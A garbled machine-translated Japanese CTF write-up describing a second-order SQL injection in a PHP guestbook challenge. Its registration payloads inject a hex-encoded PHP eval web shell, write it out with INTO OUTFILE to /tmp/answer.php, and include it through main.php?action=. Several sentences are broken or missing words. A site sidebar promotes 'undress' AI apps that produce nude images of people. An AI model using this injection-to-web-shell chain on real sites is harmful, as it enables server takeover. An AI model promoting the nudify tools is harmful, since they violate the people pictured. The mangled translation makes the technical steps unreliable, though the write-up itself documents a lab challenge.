まず最初に、これは私がこれまで見た中で最も複雑な質問だと言わざるを得ませんが、質問者の考えはあまりにも不器用です。
まず、http://8ed0a7d1a5ed5b5ac.jie.sangebaimao.com/sangebaomao.zip にアクセスしてソース コードを入手します。ヒントによると、二次注入には getshell が必要です。見ていてとても楽しいです。
1. まずはファイルを見てみましょう
このうち、include.php はグローバル化されており、GET、POST、COOKIE はアッドスラッシュでエスケープされているため、基本的には実行できません一部の格納された変数が一重引用符で囲まれていない限り、受信シェルを一度に挿入します。
main.php を見ると 25 行あります
制限の後の $num は $_SESSION['limit'] からのものです。 $_SESSION['limit'] は最終的にユーザー登録から取得されることに戻ります。制限後は outfile を実行できるためです。これは知識ポイントとみなすことができます。したがって、登録された制限を通じて書き込みパスを制御できますが、書き込まれたコンテンツを制御する方法は次のとおりです。それは明らかです。名前とメッセージのフィールドからのみ始めることができます。これら 2 つのフィールドの起源をたどってください。
名前フィールドは、登録時にニックネーム パラメーターによって最初にデータベースに保存され、その後クエリされます。 登録されたコードを遡ってみると、$name は htmlspecialchars() によって具体化されているため、name に
その後、Yulinga Daniel が 0x を使うように私に思い出させてくれました。彼が 0x と言ったらすぐに反応し、メッセージ フィールドがデータベースに入力されると、メッセージ フィールドが一重引用符で囲まれた 16 進数は、最終的にライブラリに入力されるときに元の文字列に復元されます。
この結び目を解くのは、main.php 内の 18 行の SQL ステートメントです。
この inster ステートメントでは、$name は登録時に制御可能です。なので登録するときはこんな感じで名前を登録します aa ’,0x3c3f70687020406576616c28245f504f53545b615d293b3f3e)#
このうち、16進数とは文を16進数でエンコードしたものです。この場合、insert into guestbook(`uid`,`name`, `message`) value('".$uid."','".$name."','".$message."') を実行します。 ) 実際のデータベースコードは以下の通りです
# その後コメント化されており、0x3c3f70687020406576616c28245f504f53545b615d293b3f3e はフィールドメッセージの値であり、シングルクォーテーションで囲まれていません。したがって、挿入操作を実行した後です。 m メッセージ フィールドの値は である場合、select 操作ステートメントが実行されると、メッセージはデータベースからクエリされ、実体化されないため、ゲットシェル。わかりにくいと思いませんか?
2.
その後の実装プロセスは
通常どおりにユーザー名とパスワードが入力されます。
ニックネーム aa',0x3c3f70687020406576616c28245f504f53545b615d293b3f3e)#
制限 10 を outfile 'd:/www/answer.php' に入力
次に、ログインしますメッセージを残してください掲示板に一言。
データベースを監視して、SQL ステートメントが完全に実行されていることを確認しましょう
書き込まれたファイルを見てみましょう。Web サイトのルート ディレクトリに完全に書き込まれています
3.
ここにいても大丈夫だと思いますか? でも、一番楽しいのはまだ始まったばかりです。 3台のホワイトハットサーバーでテストしたところ、何も書き込めませんでした。そこで、質問者にWebディレクトリが書き込み可能ではないか尋ねたところ、書き込み可能ではないとの回答が得られました。
また、コード内の _autoload 関数機能を利用することも忘れないでください。後で機能を調べてみると、これは処理関数の数を指定せずにクラスをインスタンス化すると、クラスファイルと同じ名前のディレクトリに .php を直接インクルードする機能でした。または .inc ファイル。実際、簡単に言うと、この関数にはファイルを含めることができます。
次に、質問のソース コードを調べて、_autoload 関数が呼び出された場所を確認しました。この関数は include.php に記述され、ini.php、int.php、その後にインクルードされています。 main.php に含まれるクラス
のインスタンス化操作があります。クラス名が $action で、$action がそれを制御していることがわかります。 。これを見ると、私の考えが明確になります。書き込み可能なディレクトリに php ファイルを書き込み、そのファイルの完全なディレクトリとファイル名を $action に渡し、その後、php が $action クラスをインスタンス化します。入力したファイルが自動的にインクルードされ、そのファイルを通じて getshell がインクルードされます。 Linux サーバーであるため、/tmp ディレクトリは書き込み可能である必要があります。実際のペイロードが出てきました。
nicknmae:filled in aa',0x3c3f70687020706870696e666f28293b3f3e)# これは phpinfo の 16 進数です。このように書くと、インクルードが含まれているかどうかが明確にわかります。
制限: 出力ファイル '/tmp/answer.php' に 10 個
その後、ログインして好きなようにコメントします。
最後にアクセスした場所 xxx.com/main.php?action=/tmp/answer
コードが正常に実行されました
次に、phpinfo を 1 つの文に置き換えて記述します。ここに落とし穴があります。それは、シェルにアクセスするにはログインする必要があるということです。包丁を使う場合は、セッションを持ち帰る方法を見つけなければなりません。そこで、 を直接記述し、Firefox を使用してパッケージを送信しました。
その後、フラグを立てることに成功しました
追記:質問者様は卑猥すぎるとしか言いようがありませんし、確かに複雑すぎると思います。しかし、シェルの二次インジェクションと機能の使用は、まさに究極です。
PHPの現在のステータス:Web開発動向を見てくださいApr 13, 2025 am 12:20 AMPHPは、現代のWeb開発、特にコンテンツ管理とeコマースプラットフォームで依然として重要です。 1)PHPには、LaravelやSymfonyなどの豊富なエコシステムと強力なフレームワークサポートがあります。 2)パフォーマンスの最適化は、Opcacheとnginxを通じて達成できます。 3)PHP8.0は、パフォーマンスを改善するためにJITコンパイラを導入します。 4)クラウドネイティブアプリケーションは、DockerおよびKubernetesを介して展開され、柔軟性とスケーラビリティを向上させます。
PHP対その他の言語:比較Apr 13, 2025 am 12:19 AMPHPは、特に迅速な開発や動的なコンテンツの処理に適していますが、データサイエンスとエンタープライズレベルのアプリケーションには良くありません。 Pythonと比較して、PHPはWeb開発においてより多くの利点がありますが、データサイエンスの分野ではPythonほど良くありません。 Javaと比較して、PHPはエンタープライズレベルのアプリケーションでより悪化しますが、Web開発により柔軟性があります。 JavaScriptと比較して、PHPはバックエンド開発により簡潔ですが、フロントエンド開発のJavaScriptほど良くありません。
PHP対Python:コア機能と機能Apr 13, 2025 am 12:16 AMPHPとPythonにはそれぞれ独自の利点があり、さまざまなシナリオに適しています。 1.PHPはWeb開発に適しており、組み込みのWebサーバーとRich Functionライブラリを提供します。 2。Pythonは、簡潔な構文と強力な標準ライブラリを備えたデータサイエンスと機械学習に適しています。選択するときは、プロジェクトの要件に基づいて決定する必要があります。
PHP:Web開発の重要な言語Apr 13, 2025 am 12:08 AMPHPは、サーバー側で広く使用されているスクリプト言語で、特にWeb開発に適しています。 1.PHPは、HTMLを埋め込み、HTTP要求と応答を処理し、さまざまなデータベースをサポートできます。 2.PHPは、ダイナミックWebコンテンツ、プロセスフォームデータ、アクセスデータベースなどを生成するために使用され、強力なコミュニティサポートとオープンソースリソースを備えています。 3。PHPは解釈された言語であり、実行プロセスには語彙分析、文法分析、編集、実行が含まれます。 4.PHPは、ユーザー登録システムなどの高度なアプリケーションについてMySQLと組み合わせることができます。 5。PHPをデバッグするときは、error_reporting()やvar_dump()などの関数を使用できます。 6. PHPコードを最適化して、キャッシュメカニズムを使用し、データベースクエリを最適化し、組み込み関数を使用します。 7
PHP:多くのウェブサイトの基礎Apr 13, 2025 am 12:07 AMPHPが多くのWebサイトよりも優先テクノロジースタックである理由には、その使いやすさ、強力なコミュニティサポート、広範な使用が含まれます。 1)初心者に適した学習と使用が簡単です。 2)巨大な開発者コミュニティと豊富なリソースを持っています。 3)WordPress、Drupal、その他のプラットフォームで広く使用されています。 4)Webサーバーとしっかりと統合して、開発の展開を簡素化します。
誇大広告を超えて:今日のPHPの役割の評価Apr 12, 2025 am 12:17 AMPHPは、特にWeb開発の分野で、最新のプログラミングで強力で広く使用されているツールのままです。 1)PHPは使いやすく、データベースとシームレスに統合されており、多くの開発者にとって最初の選択肢です。 2)動的コンテンツ生成とオブジェクト指向プログラミングをサポートし、Webサイトを迅速に作成および保守するのに適しています。 3)PHPのパフォーマンスは、データベースクエリをキャッシュおよび最適化することで改善でき、その広範なコミュニティと豊富なエコシステムにより、今日のテクノロジースタックでは依然として重要になります。
PHPの弱い参照は何ですか、そしていつ有用ですか?Apr 12, 2025 am 12:13 AMPHPでは、弱い参照クラスを通じて弱い参照が実装され、ガベージコレクターがオブジェクトの回収を妨げません。弱い参照は、キャッシュシステムやイベントリスナーなどのシナリオに適しています。オブジェクトの生存を保証することはできず、ごみ収集が遅れる可能性があることに注意する必要があります。
PHPで__invoke Magicメソッドを説明してください。Apr 12, 2025 am 12:07 AM\ _ \ _ Invokeメソッドを使用すると、オブジェクトを関数のように呼び出すことができます。 1。オブジェクトを呼び出すことができるように\ _ \ _呼び出しメソッドを定義します。 2。$ obj(...)構文を使用すると、PHPは\ _ \ _ Invokeメソッドを実行します。 3。ロギングや計算機、コードの柔軟性の向上、読みやすさなどのシナリオに適しています。
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
WebStorm Mac版
便利なJavaScript開発ツール
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
DVWA
Damn Vulnerable Web App (DVWA) は、非常に脆弱な PHP/MySQL Web アプリケーションです。その主な目的は、セキュリティ専門家が法的環境でスキルとツールをテストするのに役立ち、Web 開発者が Web アプリケーションを保護するプロセスをより深く理解できるようにし、教師/生徒が教室環境で Web アプリケーションを教え/学習できるようにすることです。安全。 DVWA の目標は、シンプルでわかりやすいインターフェイスを通じて、さまざまな難易度で最も一般的な Web 脆弱性のいくつかを実践することです。このソフトウェアは、
AtomエディタMac版ダウンロード
最も人気のあるオープンソースエディター
ドリームウィーバー CS6
ビジュアル Web 開発ツール
